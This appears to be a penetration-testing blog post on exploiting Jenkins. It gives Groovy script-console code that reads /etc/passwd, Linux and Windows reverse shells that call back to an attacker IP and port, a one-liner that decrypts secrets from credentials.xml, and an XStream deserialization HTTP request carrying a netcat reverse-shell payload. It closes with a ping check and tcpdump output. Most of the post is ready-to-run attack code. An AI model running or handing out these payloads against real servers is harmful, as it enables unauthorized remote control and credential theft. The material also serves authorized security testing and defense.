Jenkins Script Console Code Exec & Reverse Shell & Java Deserialization

You can often come across with Jenkins Script Console without any authentication.
Here you can find the some code execution scripts which can help you to run some commands and even get a reverse shell depending on the Operating System version.

Jenkins Code Execution via Script Console

def command = "cat /etc/passwd"
def proc = command.execute()
proc.waitFor()

println "Process exit code: ${proc.exitValue()}"
println "Std Err: ${proc.err.text}"
println "Std Out: ${proc.in.text}"

Getting Reverse Shell on Linux Machine

We can simply use Java Reverse Shell from pentestmonkey.

r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/IP/PORT;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()

Getting Reverse Shell on Windows Machine

String host="localhost";
int port=8044;
String cmd="cmd.exe";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()&gt;0)so.write(pi.read());while(pe.available()&gt;0)so.write(pe.read());while(si.available()&gt;0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();

Extracting passphrase from Jenkins’ credentials.xml

Credentials.xml can be found under the Jenkins installation folder which may help us to have another password and perhaps getting root/administrative access on the server. In order to check how to get credentials, please see the post here.

println( hudson.util.Secret.decrypt("Content_of_credentials.xml") )

Additional Resource can be found here: https://leonjza.github.io/blog/2015/05/27/jenkins-to-meterpreter—toying-with-powersploit/

Jenkins xstream Deserialization

Jenkins < 1.650

A simple netcat reverse shell payload can help us to get a reverse shell.

POST /createItem?name=random HTTP/1.1
Host: 192.168.207.178:8081
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Content-Type: application/xml
Content-Length: 759


<command>rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc IP PORT >/tmp/f</command>

If you would like to only test the vulnerability in a pentest engagement. You can simply use the ping command as below and replace the command line with: ping -c 3 IP

<command>ping-c 3 192.168.207.176</command>

Listen the ICMP traffic with tcpdump, make sure to replace the interface if you are using other interface rather than eth0:

tcpdump -ni eth0 icmp

If all goes well, you will have the output as below:

[email protected]:~# tcpdump -ni eth0 icmp
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on eth0, link-type EN10MB (Ethernet), capture size 262144 bytes
09:55:33.571449 IP 192.168.207.178 &gt; 192.168.207.176: ICMP echo request, id 18015, seq 1, length 64
09:55:33.571851 IP 192.168.207.176 &gt; 192.168.207.178: ICMP echo reply, id 18015, seq 1, length 64
09:55:34.574175 IP 192.168.207.178 &gt; 192.168.207.176: ICMP echo request, id 18015, seq 2, length 64
09:55:34.574231 IP 192.168.207.176 &gt; 192.168.207.178: ICMP echo reply, id 18015, seq 2, length 64
09:55:35.577863 IP 192.168.207.178 &gt; 192.168.207.176: ICMP echo request, id 18015, seq 3, length 64
09:55:35.577918 IP 192.168.207.176 &gt; 192.168.207.178: ICMP echo reply, id 18015, seq 3, length 64
<div>::CODECOLORER_BLOCK_9::</div>

1 thought on “Jenkins Script Console Code Exec & Reverse Shell & Java Deserialization”

Leave a Comment